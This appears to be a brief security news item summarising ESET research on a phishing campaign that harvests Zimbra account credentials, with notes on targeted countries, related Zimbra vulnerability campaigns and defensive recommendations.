ESET researchers have discovered an ongoing phishing campaign targeting users of the Zimbra Collaboration software platform. The campaign, which started at least in April 2023, aims to collect Zimbra account users' credentials.
Infection process
The campaign uses different social engineering lures such as an email server update, account deactivation, or similar issues to deceive recipients.
- The phishing email appears to come from an email server administrator and contains an HTML file that directs the user to a fake Zimbra login page.
- In some cases, the attackers have also been found using compromised Zimbra accounts to send subsequent waves of phishing emails.
- The submitted credentials are then collected and sent to a server controlled by the attacker.
Despite not being highly sophisticated, the campaign is still successful, owing to the wide usage of the Zimbra Collaboration suite across multiple organizations, thus, making them lucrative targets for adversaries.
Targeted victims
- The targets of the campaign include small and medium businesses as well as governmental entities.
- The countries most affected by the campaign are Poland, Ecuador, and Italy.
Worth noting
The campaign examined by ESET relies solely on social engineering tactics and user engagement. However, note that that this may not always be the situation.
- In a previous campaign disclosed by Proofpoint in March 2023, the APT group Winter Vivern (also known as TA473) exploited the CVE-2022-27926 vulnerability to target webmail portals of military, government, and diplomatic entities in European countries.
- Another instance reported by Volexity in February 2022, involved a group called TEMP_Heretic extracting emails from European government and media organizations by taking advantage of another vulnerability (CVE-2022-24682) in Zimbra Collaboration's Calendar feature.
- In the most recent reference, EclecticIQ researchers examined a campaign resembling the current campaign. The primary distinction is that the HTML link leading to the fraudulent Zimbra login page is directly embedded within the email itself.
Conclusion
Since the current campaign heavily relies on phishing emails, security teams are advised to implement necessary email security controls to stay safe. Additionally, it is recommended to apply the latest security updates and look at the IOCs associated with the campaign to block the indicators at the endpoints.
Publisher
/https://cyware-ent.s3.amazonaws.com/image_bank/f499_Shutterstock_1133471762.jpg)
/https://cyware-ent.s3.amazonaws.com/image_bank/shutterstock_466830185.jpg)
